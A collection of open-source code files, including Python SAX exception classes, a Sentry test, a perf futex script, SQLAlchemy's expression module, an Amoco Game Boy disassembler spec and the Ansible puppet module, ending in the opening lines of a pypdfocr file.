receive a SAXException as the argument to the handlers in the
ErrorHandler interface, you are not actually required to raise
the exception; instead, you can simply read the information in
it."""
def __init__(self, msg, exception=None):
"""Creates an exception. The message is required, but the exception
is optional."""
self._msg = msg
self._exception = exception
Exception.__init__(self, msg)
def getMessage(self):
"Return a message for this exception."
return self._msg
def getException(self):
"Return the embedded exception, or None if there was none."
return self._exception
def __str__(self):
"Create a string representation of the exception."
return self._msg
def __getitem__(self, ix):
"""Avoids weird error messages if someone does exception[ix] by
mistake, since Exception has __getitem__ defined."""
raise AttributeError("__getitem__")
# ===== SAXPARSEEXCEPTION =====
class SAXParseException(SAXException):
"""Encapsulate an XML parse error or warning.
This exception will include information for locating the error in
the original XML document. Note that although the application will
receive a SAXParseException as the argument to the handlers in the
ErrorHandler interface, the application is not actually required
to raise the exception; instead, it can simply read the
information in it and take a different action.
Since this exception is a subclass of SAXException, it inherits
the ability to wrap another exception."""
def __init__(self, msg, exception, locator):
"Creates the exception. The exception parameter is allowed to be None."
SAXException.__init__(self, msg, exception)
self._locator = locator
# We need to cache this stuff at construction time.
# If this exception is raised, the objects through which we must
# traverse to get this information may be deleted by the time
# it gets caught.
self._systemId = self._locator.getSystemId()
self._colnum = self._locator.getColumnNumber()
self._linenum = self._locator.getLineNumber()
def getColumnNumber(self):
"""The column number of the end of the text where the exception
occurred."""
return self._colnum
def getLineNumber(self):
"The line number of the end of the text where the exception occurred."
return self._linenum
def getPublicId(self):
"Get the public identifier of the entity where the exception occurred."
return self._locator.getPublicId()
def getSystemId(self):
"Get the system identifier of the entity where the exception occurred."
return self._systemId
def __str__(self):
"Create a string representation of the exception."
sysid = self.getSystemId()
if sysid is None:
sysid = "<unknown>"
linenum = self.getLineNumber()
if linenum is None:
linenum = "?"
colnum = self.getColumnNumber()
if colnum is None:
colnum = "?"
return "%s:%s:%s: %s" % (sysid, linenum, colnum, self._msg)
# ===== SAXNOTRECOGNIZEDEXCEPTION =====
class SAXNotRecognizedException(SAXException):
"""Exception class for an unrecognized identifier.
An XMLReader will raise this exception when it is confronted with an
unrecognized feature or property. SAX applications and extensions may
use this class for similar purposes."""
pass
# ===== SAXNOTSUPPORTEDEXCEPTION =====
class SAXNotSupportedException(SAXException):
"""Exception class for an unsupported operation.
An XMLReader will raise this exception when a service it cannot
perform is requested (specifically setting a state or value). SAX
applications and extensions may use this class for similar
purposes."""
pass
# ===== SAXNOTSUPPORTEDEXCEPTION =====
class SAXReaderNotAvailable(SAXNotSupportedException):
"""Exception class for a missing driver.
An XMLReader module (driver) should raise this exception when it
is first imported, e.g. when a support module cannot be imported.
It also may be raised during parsing, e.g. if executing an external
program is not permitted."""
pass
| gpl-3.0 |
mitsuhiko/sentry | tests/sentry/db/models/test_utils.py | 9 | 1253 | from __future__ import absolute_import
from sentry.testutils import TestCase
from sentry.db.models.utils import slugify_instance
from sentry.models import Organization
class SlugifyInstanceTest(TestCase):
def test_no_conflict(self):
org = Organization(name='matt')
slugify_instance(org, 'matt')
assert org.slug == 'matt'
assert not Organization.objects.filter(slug='matt').exists()
def test_conflict(self):
base_slug = self.organization.slug
org = Organization(name='foo')
slugify_instance(org, base_slug)
assert org.slug.startswith(base_slug + '-'), org.slug
assert not Organization.objects.filter(slug=org.slug).exists()
def test_reserved(self):
base_slug = self.organization.slug
org = Organization(name='foo')
slugify_instance(org, base_slug, reserved=(base_slug,))
assert not org.slug.startswith(base_slug + '-'), org.slug
assert not Organization.objects.filter(slug=org.slug).exists()
def test_max_length(self):
org = Organization(name='matt')
slugify_instance(org, 'matt', max_length=2)
assert org.slug == 'ma', org.slug
assert not Organization.objects.filter(slug='ma').exists()
| bsd-3-clause |
Herna1994/android_kernel_cyanogen_msm8916 | tools/perf/scripts/python/futex-contention.py | 11261 | 1486 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
| gpl-2.0 |
aESeguridad/GERE | venv/lib/python2.7/site-packages/sqlalchemy/sql/expression.py | 34 | 5833 | # sql/expression.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Defines the public namespace for SQL expression constructs.
Prior to version 0.9, this module contained all of "elements", "dml",
"default_comparator" and "selectable". The module was broken up
and most "factory" functions were moved to be grouped with their associated
class.
"""
__all__ = [
'Alias', 'ClauseElement', 'ColumnCollection', 'ColumnElement',
'CompoundSelect', 'Delete', 'FromClause', 'Insert', 'Join', 'Select',
'Selectable', 'TableClause', 'Update', 'alias', 'and_', 'asc', 'between',
'bindparam', 'case', 'cast', 'column', 'delete', 'desc', 'distinct',
'except_', 'except_all', 'exists', 'extract', 'func', 'modifier',
'collate', 'insert', 'intersect', 'intersect_all', 'join', 'label',
'literal', 'literal_column', 'not_', 'null', 'nullsfirst', 'nullslast',
'or_', 'outparam', 'outerjoin', 'over', 'select', 'subquery',
'table', 'text',
'tuple_', 'type_coerce', 'union', 'union_all', 'update']
from .visitors import Visitable
from .functions import func, modifier, FunctionElement, Function
from ..util.langhelpers import public_factory
from .elements import ClauseElement, ColumnElement,\
BindParameter, UnaryExpression, BooleanClauseList, \
Label, Cast, Case, ColumnClause, TextClause, Over, Null, \
True_, False_, BinaryExpression, Tuple, TypeClause, Extract, \
Grouping, not_, \
collate, literal_column, between,\
literal, outparam, type_coerce, ClauseList, FunctionFilter
from .elements import SavepointClause, RollbackToSavepointClause, \
ReleaseSavepointClause
from .base import ColumnCollection, Generative, Executable, \
PARSE_AUTOCOMMIT
from .selectable import Alias, Join, Select, Selectable, TableClause, \
CompoundSelect, CTE, FromClause, FromGrouping, SelectBase, \
alias, GenerativeSelect, \
subquery, HasPrefixes, HasSuffixes, Exists, ScalarSelect, TextAsFrom
from .dml import Insert, Update, Delete, UpdateBase, ValuesBase
# factory functions - these pull class-bound constructors and classmethods
# from SQL elements and selectables into public functions. This allows
# the functions to be available in the sqlalchemy.sql.* namespace and
# to be auto-cross-documenting from the function to the class itself.
and_ = public_factory(BooleanClauseList.and_, ".expression.and_")
or_ = public_factory(BooleanClauseList.or_, ".expression.or_")
bindparam = public_factory(BindParameter, ".expression.bindparam")
select = public_factory(Select, ".expression.select")
text = public_factory(TextClause._create_text, ".expression.text")
table = public_factory(TableClause, ".expression.table")
column = public_factory(ColumnClause, ".expression.column")
over = public_factory(Over, ".expression.over")
label = public_factory(Label, ".expression.label")
case = public_factory(Case, ".expression.case")
cast = public_factory(Cast, ".expression.cast")
extract = public_factory(Extract, ".expression.extract")
tuple_ = public_factory(Tuple, ".expression.tuple_")
except_ = public_factory(CompoundSelect._create_except, ".expression.except_")
except_all = public_factory(
CompoundSelect._create_except_all, ".expression.except_all")
intersect = public_factory(
CompoundSelect._create_intersect, ".expression.intersect")
intersect_all = public_factory(
CompoundSelect._create_intersect_all, ".expression.intersect_all")
union = public_factory(CompoundSelect._create_union, ".expression.union")
union_all = public_factory(
CompoundSelect._create_union_all, ".expression.union_all")
exists = public_factory(Exists, ".expression.exists")
nullsfirst = public_factory(
UnaryExpression._create_nullsfirst, ".expression.nullsfirst")
nullslast = public_factory(
UnaryExpression._create_nullslast, ".expression.nullslast")
asc = public_factory(UnaryExpression._create_asc, ".expression.asc")
desc = public_factory(UnaryExpression._create_desc, ".expression.desc")
distinct = public_factory(
UnaryExpression._create_distinct, ".expression.distinct")
true = public_factory(True_._instance, ".expression.true")
false = public_factory(False_._instance, ".expression.false")
null = public_factory(Null._instance, ".expression.null")
join = public_factory(Join._create_join, ".expression.join")
outerjoin = public_factory(Join._create_outerjoin, ".expression.outerjoin")
insert = public_factory(Insert, ".expression.insert")
update = public_factory(Update, ".expression.update")
delete = public_factory(Delete, ".expression.delete")
funcfilter = public_factory(
FunctionFilter, ".expression.funcfilter")
# internal functions still being called from tests and the ORM,
# these might be better off in some other namespace
from .base import _from_objects
from .elements import _literal_as_text, _clause_element_as_expr,\
_is_column, _labeled, _only_column_elements, _string_or_unprintable, \
_truncated_label, _clone, _cloned_difference, _cloned_intersection,\
_column_as_key, _literal_as_binds, _select_iterables, \
_corresponding_column_or_error, _literal_as_label_reference, \
_expression_literal_as_text
from .selectable import _interpret_as_from
# old names for compatibility
_Executable = Executable
_BindParamClause = BindParameter
_Label = Label
_SelectBase = SelectBase
_BinaryExpression = BinaryExpression
_Cast = Cast
_Null = Null
_False = False_
_True = True_
_TextClause = TextClause
_UnaryExpression = UnaryExpression
_Case = Case
_Tuple = Tuple
_Over = Over
_Generative = Generative
_TypeClause = TypeClause
_Extract = Extract
_Exists = Exists
_Grouping = Grouping
_FromGrouping = FromGrouping
_ScalarSelect = ScalarSelect
| gpl-3.0 |
x86Labs/amoco | amoco/arch/z80/spec_gb.py | 6 | 11432 | # -*- coding: utf-8 -*-
# This code is part of Amoco
# Copyright (C) 2012 Axel Tillequin (bdcht3@gmail.com)
# published under GPLv2 license
# spec_xxx files are providers for instruction objects.
# These objects are wrapped and created by disasm.py.
from amoco.logger import *
logger = Log(__name__)
from amoco.arch.core import *
from amoco.arch.z80 import env
# modifications of spec_mostek.ISPECS according to GB specs...
# (all DD/FD prefixed spec are removed IX/IY
# remove unused registers:
del env.ix,env.iy
del env.ir
del env.i, env.r
del env.ixh,env.ixl
del env.iyh,env.iyl
# remove unused flags & conditions:
del env.pf
del env.xf
del env.yf
del env.sf
del env.CONDITION[0b100]
del env.CONDITION[0b101]
del env.CONDITION[0b110]
del env.CONDITION[0b111]
# update flags:
env.cf.pos = 4
env.hf.pos = 5
env.nf.pos = 6
env.zf.pos = 7
# Prefixes are removed (obj.misc['pfx'] is always None)
# simplified getreg8/getreg16
def getreg8(obj,x):
r = env.reg8[x]
return r
def getreg16(obj,x):
if x==0b11 and obj.mnemonic not in ('PUSH','POP'):
r = env.sp
else:
r = env.reg16[x]
return r
ISPECS = []
# ----------------
# 8-bit load group
# ----------------
# LD r,r'
@ispec("8<[ 01 rd(3) rs(3) ]", mnemonic='LD')
def mostek_ld(obj,rd,rs):
dst,src = getreg8(obj,rd),getreg8(obj,rs)
if dst._is_mem or src._is_mem:
if rd==rs or (obj.misc['pfx'] is not None):
raise InstructionError(obj)
obj.operands = [dst,src]
obj.type = type_data_processing
# LD r,n
@ispec("16<[ n(8) 00 r(3) 110 ]", mnemonic='LD')
def mostek_ld(obj,r,n):
dst = getreg8(obj,r)
if r==0b110 and obj.misc['pfx'] is not None:
raise InstructionError(obj)
obj.operands = [dst,env.cst(n,8)]
obj.type = type_data_processing
# LD (BC/DE), A
@ispec("8<[ 000 b rev 010 ]", mnemonic='LD')
def mostek_ld(obj,b,rev):
base = env.reg16[b]
obj.operands = [env.mem(base,8), env.a]
if rev: obj.operands.reverse()
obj.type = type_data_processing
# LDD/LDI a,(hl)
@ispec("8<[ {3a} ]", mnemonic='LDD')
@ispec("8<[ {2a} ]", mnemonic='LDI')
def mostek_ld(obj):
obj.operands = [env.a, env.reg8[0b110]]
obj.type = type_data_processing
@ispec("8<[ {32} ]", mnemonic='LDD')
@ispec("8<[ {22} ]", mnemonic='LDI')
def mostek_ld(obj):
obj.operands = [env.reg8[0b110], env.a]
obj.type = type_data_processing
@ispec("8<[ {f2} ]", mnemonic='LD')
def mostek_ld(obj):
base = env.composer([env.c, env.cst(0xff,8)])
obj.operands = [env.a, env.mem(base,8)]
obj.type = type_data_processing
@ispec("8<[ {e2} ]", mnemonic='LD')
def mostek_ld(obj):
base = env.composer([env.c, env.cst(0xff,8)])
obj.operands = [env.mem(base,8), env.a]
obj.type = type_data_processing
@ispec("16<[ n(8) {f0} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(0xff00,16)+n
obj.operands = [env.a, env.mem(base,8)]
obj.type = type_data_processing
@ispec("16<[ n(8) {e0} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(0xff00,16)+n
obj.operands = [env.mem(base,8), env.a]
obj.type = type_data_processing
@ispec("24<[ n(16) {fa} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(n,16)
obj.operands = [env.a, env.mem(base,8)]
obj.type = type_data_processing
@ispec("24<[ n(16) {ea} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(n,16)
obj.operands = [env.mem(base,8), env.a]
obj.type = type_data_processing
# -----------------
# 16-bit load group
# -----------------
# LD dd,nn
@ispec("24<[ nn(16) 00 dd(2) 0001 ]", mnemonic='LD')
def mostek_ld(obj,dd,nn):
dst = getreg16(obj,dd)
obj.operands = [dst,env.cst(nn,16)]
obj.type = type_data_processing
# LD hl,(nn) / LD (nn), hl
@ispec("24<[ nn(16) 00 10 rev 010 ]", mnemonic='LD')
def mostek_ld(obj,rev,nn):
dst = getreg16(obj,0b10)
obj.operands = [dst,env.mem(env.cst(nn,16),16)]
if not rev: obj.operands.reverse()
obj.type = type_data_processing
# LD SP,HL
@ispec("8<[ 1111 1001 ]", mnemonic='LD')
def mostek_ld(obj):
dst = getreg16(obj,0b10)
obj.operands = [env.sp,dst]
obj.type = type_data_processing
# PUSH qq
@ispec("8<[ 11 qq(2) 0101 ]", mnemonic='PUSH')
@ispec("8<[ 11 qq(2) 0001 ]", mnemonic='POP')
def mostek_ld(obj,qq):
src = getreg16(obj,qq)
if src==env.sp: src=env.af
obj.operands = [src]
obj.type = type_data_processing
# LDHL SP,n
@ispec("16<[ n(8) {f8} ]", mnemonic='LDHL')
def mostek_ld(obj,n):
disp = env.cst(n,8).signextend(16)
obj.operands = [env.sp, disp]
obj.type = type_data_processing
# LD (nn), SP
@ispec("24<[ nn(16) {08} ]", mnemonic='LD')
def mostek_ld(obj,nn):
obj.operands = [env.mem(env.cst(nn,16),16), env.sp]
obj.type = type_data_processing
# ----------------------
# 8-bit Arithmetic Group
# ----------------------
# ADD a,r
@ispec("8<[ 1000 0 r(3) ]", mnemonic='ADD')
@ispec("8<[ 1000 1 r(3) ]", mnemonic='ADC')
@ispec("8<[ 1001 0 r(3) ]", mnemonic='SUB')
@ispec("8<[ 1001 1 r(3) ]", mnemonic='SBC')
@ispec("8<[ 1010 0 r(3) ]", mnemonic='AND')
@ispec("8<[ 1011 0 r(3) ]", mnemonic='OR')
@ispec("8<[ 1010 1 r(3) ]", mnemonic='XOR')
@ispec("8<[ 1011 1 r(3) ]", mnemonic='CP')
@ispec("8<[ 00 r(3) 100 ]", mnemonic='INC')
@ispec("8<[ 00 r(3) 101 ]", mnemonic='DEC')
def mostek_arithmetic(obj,r):
if r==0b110 and obj.misc['pfx'] is not None:
raise InstructionError(obj)
src = getreg8(obj,r)
obj.operands = [env.a,src]
if obj.mnemonic in ('INC','DEC'): obj.operands.pop(0)
obj.type = type_data_processing
@ispec("16<[ n(8) 1100 0110 ]", mnemonic='ADD')
@ispec("16<[ n(8) 1100 1110 ]", mnemonic='ADC')
@ispec("16<[ n(8) 1101 0110 ]", mnemonic='SUB')
@ispec("16<[ n(8) 1101 1110 ]", mnemonic='SBC')
@ispec("16<[ n(8) 1110 0110 ]", mnemonic='AND')
@ispec("16<[ n(8) 1111 0110 ]", mnemonic='OR')
@ispec("16<[ n(8) 1110 1110 ]", mnemonic='XOR')
@ispec("16<[ n(8) 1111 1110 ]", mnemonic='CP')
def mostek_arithmetic(obj,n):
obj.operands = [env.a,env.cst(n,8)]
obj.type = type_data_processing
# ADD SP,n
@ispec("16<[ n(8) {e8} ]", mnemonic='ADD')
def mostek_ld(obj,n):
disp = env.cst(n,8).signextend(16)
obj.operands = [env.sp, disp]
obj.type = type_data_processing
# ------------------------------------------------
# General Purpose Arithmetic and CPU Control Group
# ------------------------------------------------
@ispec("8<[ {76} ]", mnemonic='HALT')
@ispec("8<[ {f3} ]", mnemonic='DI')
@ispec("8<[ {fb} ]", mnemonic='EI')
@ispec("8<[ {10} ]", mnemonic='STOP')
def mostek_gpa_cpuc(obj):
obj.operands = []
obj.type = type_cpu_state
@ispec("8<[ {27} ]", mnemonic='DAA')
@ispec("8<[ {2f} ]", mnemonic='CPL')
@ispec("8<[ {3f} ]", mnemonic='CCF')
@ispec("8<[ {37} ]", mnemonic='SCF')
@ispec("8<[ {00} ]", mnemonic='NOP')
def mostek_arithmetic(obj):
obj.operands = []
obj.type = type_data_processing
@ispec("8<[ {d9} ]", mnemonic='RETI')
def mostek_arithmetic(obj):
obj.operands = []
obj.type = type_control_flow
# -----------------------
# 16-bit Arithmetic Group
# -----------------------
@ispec(" 8<[ 00 ss(2) 1001 ]", mnemonic='ADD')
@ispec(" 8<[ 00 ss(2) 0011 ]", mnemonic='INC')
@ispec(" 8<[ 00 ss(2) 1011 ]", mnemonic='DEC')
def mostek_arithmetic(obj,ss):
dst = getreg16(obj,0b10) #hl (or ix/iy)
src = getreg16(obj,ss)
obj.operands = [dst,src]
if obj.mnemonic in ('INC','DEC'): obj.operands.pop(0)
obj.type = type_data_processing
@ispec("16<[ n(8) 1100 0110 ]", mnemonic='ADD')
@ispec("16<[ n(8) 1100 1110 ]", mnemonic='ADC')
@ispec("16<[ n(8) 1101 0110 ]", mnemonic='SUB')
@ispec("16<[ n(8) 1101 1110 ]", mnemonic='SBC')
@ispec("16<[ n(8) 1110 0110 ]", mnemonic='AND')
@ispec("16<[ n(8) 1111 0110 ]", mnemonic='OR')
@ispec("16<[ n(8) 1110 1110 ]", mnemonic='XOR')
@ispec("16<[ n(8) 1111 1110 ]", mnemonic='CP')
def mostek_arithmetic(obj,n):
# DD/FD prefix are ignored
obj.operands = [env.a,env.cst(n,8)]
obj.type = type_data_processing
# ----------------------
# Rotate and Shift Group
# ----------------------
@ispec("8<[ {07} ]", mnemonic='RLCA')
@ispec("8<[ {17} ]", mnemonic='RLA')
@ispec("8<[ {0f} ]", mnemonic='RRCA')
@ispec("8<[ {1f} ]", mnemonic='RRA')
def mostek_rotshift(obj):
obj.operands = []
obj.type = type_data_processing
@ispec("16<[ 00000 r(3) {cb} ]", mnemonic='RLC')
@ispec("16<[ 00010 r(3) {cb} ]", mnemonic='RL')
@ispec("16<[ 00001 r(3) {cb} ]", mnemonic='RRC')
@ispec("16<[ 00011 r(3) {cb} ]", mnemonic='RR')
@ispec("16<[ 00100 r(3) {cb} ]", mnemonic='SLA')
@ispec("16<[ 00110 r(3) {cb} ]", mnemonic='SWAP') #undocumented
@ispec("16<[ 00101 r(3) {cb} ]", mnemonic='SRA')
@ispec("16<[ 00111 r(3) {cb} ]", mnemonic='SRL')
def mostek_rotshift(obj,r):
if obj.misc['pfx'] is not None:
raise InstructionError(obj)
op1 = getreg8(obj,r)
obj.operands = [op1]
obj.type = type_data_processing
# -----------------------------
# Bit Set, Reset and Test Group
# -----------------------------
# unprefixed BIT & SET:
@ispec("16<[ 01 b(3) r(3) {cb} ]", mnemonic='BIT')
@ispec("16<[ 11 b(3) r(3) {cb} ]", mnemonic='SET')
def mostek_bitset(obj,b,r):
if obj.misc['pfx'] is not None:
raise InstructionError(obj)
op1 = env.cst(b,3)
op2 = getreg8(obj,r)
obj.operands = [op1,op2]
obj.type = type_data_processing
# ----------
# Jump Group
# ----------
@ispec("24<[ nn(16) 11 000 011 ]", mnemonic='JP')
def mostek_jump(obj,nn):
obj.operands = [env.cst(nn,16)]
obj.type = type_control_flow
@ispec("24<[ nn(16) 11 cc(3) 010 ]", mnemonic='JPcc')
def mostek_jump(obj,cc,nn):
if cc>=0b100: raise InstructionError(obj)
obj.cond = env.CONDITION[cc]
obj.operands = [obj.cond[0],env.cst(nn,16)]
obj.type = type_control_flow
@ispec("16<[ e(8) {18} ]", mnemonic='JR')
@ispec("16<[ e(8) {10} ]", mnemonic='DJNZ')
@ispec("16<[ e(8) {38} ]", mnemonic='JRcc', cond=('c',env.cf==1))
@ispec("16<[ e(8) {30} ]", mnemonic='JRcc', cond=('nc',env.cf==0))
@ispec("16<[ e(8) {28} ]", mnemonic='JRcc', cond=('z',env.zf==1))
@ispec("16<[ e(8) {20} ]", mnemonic='JRcc', cond=('nz',env.zf==0))
def mostek_jump(obj,e):
disp = env.cst(e,8).signextend(16)
obj.operands = [disp]
if hasattr(obj,'cond'):
obj.operands.insert(0,obj.cond[0])
obj.type = type_control_flow
@ispec("8<[ {e9} ]", mnemonic='JP')
def mostek_jump(obj):
r = getreg16(obj,0b10)
# is it mem(r,16) ??
obj.operands = [r]
obj.type = type_control_flow
# ---------------------
# Call and Return Group
# ---------------------
@ispec("24<[ nn(16) 1100 1101 ]", mnemonic='CALL')
def mostek_call(obj,nn):
obj.operands = [env.cst(nn,16)]
obj.type = type_control_flow
@ispec("24<[ nn(16) 11 cc(3) 100 ]", mnemonic='CALLcc')
def mostek_call(obj,cc,nn):
if cc>=0b100: raise InstructionError(obj)
obj.cond = env.CONDITION[cc]
obj.operands = [obj.cond[0],env.cst(nn,16)]
obj.type = type_control_flow
@ispec("8<[ {c9} ]", mnemonic='RET')
def mostek_ret(obj):
obj.operands = []
obj.type = type_control_flow
@ispec("8<[ 11 cc(3) 000 ]", mnemonic='RETcc')
def mostek_ret(obj,cc):
if cc>=0b100: raise InstructionError(obj)
obj.cond = env.CONDITION[cc]
obj.operands = [obj.cond[0]]
obj.type = type_control_flow
@ispec("8<[ 11 t(3) 111 ]", mnemonic='RST')
def mostek_rst(obj,t):
p = (0x00, 0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38)[t]
obj.operands = [env.cst(p,8)]
obj.type = type_control_flow
| gpl-2.0 |
gunzy83/ansible-modules-extras | system/puppet.py | 60 | 8853 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import os
import pipes
import stat
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
# Let snippet from module_utils/basic.py return a proper error in this case
pass
DOCUMENTATION = '''
---
module: puppet
short_description: Runs puppet
description:
- Runs I(puppet) agent or apply in a reliable manner
version_added: "2.0"
options:
timeout:
description:
- How long to wait for I(puppet) to finish.
required: false
default: 30m
puppetmaster:
description:
- The hostname of the puppetmaster to contact.
required: false
default: None
manifest:
description:
- Path to the manifest file to run puppet apply on.
required: false
default: None
facts:
description:
- A dict of values to pass in as persistent external facter facts
required: false
default: None
facter_basename:
description:
- Basename of the facter output file
required: false
default: ansible
environment:
description:
- Puppet environment to be used.
required: false
default: None
logdest:
description:
- Where the puppet logs should go, if puppet apply is being used
required: false
default: stdout
choices: [ 'stdout', 'syslog' ]
version_added: "2.1"
certname:
description:
- The name to use when handling certificates.
required: false
default: None
version_added: "2.1"
tags:
description:
- A comma-separated list of puppet tags to be used.
required: false
default: None
version_added: "2.1"
execute:
description:
- Execute a specific piece of Puppet code. It has no effect with
a puppetmaster.
required: false
default: None
version_added: "2.1"
requirements: [ puppet ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
# Run puppet agent and fail if anything goes wrong
- puppet
# Run puppet and timeout in 5 minutes
- puppet: timeout=5m
# Run puppet using a different environment
- puppet: environment=testing
# Run puppet using a specific certname
- puppet: certname=agent01.example.com
# Run puppet using a specific piece of Puppet code. Has no effect with a
# puppetmaster.
- puppet: execute='include ::mymodule'
# Run puppet using a specific tags
- puppet: tags=update,nginx
'''
def _get_facter_dir():
if os.getuid() == 0:
return '/etc/facter/facts.d'
else:
return os.path.expanduser('~/.facter/facts.d')
def _write_structured_data(basedir, basename, data):
if not os.path.exists(basedir):
os.makedirs(basedir)
file_path = os.path.join(basedir, "{0}.json".format(basename))
# This is more complex than you might normally expect because we want to
# open the file with only u+rw set. Also, we use the stat constants
# because ansible still supports python 2.4 and the octal syntax changed
out_file = os.fdopen(
os.open(
file_path, os.O_CREAT | os.O_WRONLY,
stat.S_IRUSR | stat.S_IWUSR), 'w')
out_file.write(json.dumps(data).encode('utf8'))
out_file.close()
def main():
module = AnsibleModule(
argument_spec=dict(
timeout=dict(default="30m"),
puppetmaster=dict(required=False, default=None),
manifest=dict(required=False, default=None),
logdest=dict(
required=False, default='stdout',
choices=['stdout', 'syslog']),
show_diff=dict(
# internal code to work with --diff, do not use
default=False, aliases=['show-diff'], type='bool'),
facts=dict(default=None),
facter_basename=dict(default='ansible'),
environment=dict(required=False, default=None),
certname=dict(required=False, default=None),
tags=dict(required=False, default=None, type='list'),
execute=dict(required=False, default=None),
),
supports_check_mode=True,
mutually_exclusive=[
('puppetmaster', 'manifest'),
('puppetmaster', 'manifest', 'execute'),
],
)
p = module.params
global PUPPET_CMD
PUPPET_CMD = module.get_bin_path("puppet", False, ['/opt/puppetlabs/bin'])
if not PUPPET_CMD:
module.fail_json(
msg="Could not find puppet. Please ensure it is installed.")
global TIMEOUT_CMD
TIMEOUT_CMD = module.get_bin_path("timeout", False)
if p['manifest']:
if not os.path.exists(p['manifest']):
module.fail_json(
msg="Manifest file %(manifest)s not found." % dict(
manifest=p['manifest']))
# Check if puppet is disabled here
if not p['manifest']:
rc, stdout, stderr = module.run_command(
PUPPET_CMD + " config print agent_disabled_lockfile")
if os.path.exists(stdout.strip()):
module.fail_json(
msg="Puppet agent is administratively disabled.",
disabled=True)
elif rc != 0:
module.fail_json(
msg="Puppet agent state could not be determined.")
if module.params['facts'] and not module.check_mode:
_write_structured_data(
_get_facter_dir(),
module.params['facter_basename'],
module.params['facts'])
if TIMEOUT_CMD:
base_cmd = "%(timeout_cmd)s -s 9 %(timeout)s %(puppet_cmd)s" % dict(
timeout_cmd=TIMEOUT_CMD,
timeout=pipes.quote(p['timeout']),
puppet_cmd=PUPPET_CMD)
else:
base_cmd = PUPPET_CMD
if not p['manifest']:
cmd = ("%(base_cmd)s agent --onetime"
" --ignorecache --no-daemonize --no-usecacheonfailure --no-splay"
" --detailed-exitcodes --verbose --color 0") % dict(
base_cmd=base_cmd,
)
if p['puppetmaster']:
cmd += " --server %s" % pipes.quote(p['puppetmaster'])
if p['show_diff']:
cmd += " --show_diff"
if p['environment']:
cmd += " --environment '%s'" % p['environment']
if p['tags']:
cmd += " --tags '%s'" % ','.join(p['tags'])
if p['certname']:
cmd += " --certname='%s'" % p['certname']
if module.check_mode:
cmd += " --noop"
else:
cmd += " --no-noop"
else:
cmd = "%s apply --detailed-exitcodes " % base_cmd
if p['logdest'] == 'syslog':
cmd += "--logdest syslog "
if p['environment']:
cmd += "--environment '%s' " % p['environment']
if p['certname']:
cmd += " --certname='%s'" % p['certname']
if p['execute']:
cmd += " --execute '%s'" % p['execute']
if p['tags']:
cmd += " --tags '%s'" % ','.join(p['tags'])
if module.check_mode:
cmd += "--noop "
else:
cmd += "--no-noop "
cmd += pipes.quote(p['manifest'])
rc, stdout, stderr = module.run_command(cmd)
if rc == 0:
# success
module.exit_json(rc=rc, changed=False, stdout=stdout, stderr=stderr)
elif rc == 1:
# rc==1 could be because it's disabled
# rc==1 could also mean there was a compilation failure
disabled = "administratively disabled" in stdout
if disabled:
msg = "puppet is disabled"
else:
msg = "puppet did not run"
module.exit_json(
rc=rc, disabled=disabled, msg=msg,
error=True, stdout=stdout, stderr=stderr)
elif rc == 2:
# success with changes
module.exit_json(rc=0, changed=True, stdout=stdout, stderr=stderr)
elif rc == 124:
# timeout
module.exit_json(
rc=rc, msg="%s timed out" % cmd, stdout=stdout, stderr=stderr)
else:
# failure
module.fail_json(
rc=rc, msg="%s failed with return code: %d" % (cmd, rc),
stdout=stdout, stderr=stderr)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
virantha/pypdfocr | pypdfocr/pypdfocr_multiprocessing.py | 1 | 1954 | #!/usr/bin/env python2.7
# Copyright 2013 Virantha Ekanayake All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os, multiprocessing.forking
import logging
""" Special work-around to support multiprocessing and pyinstaller --onefile on windows systms
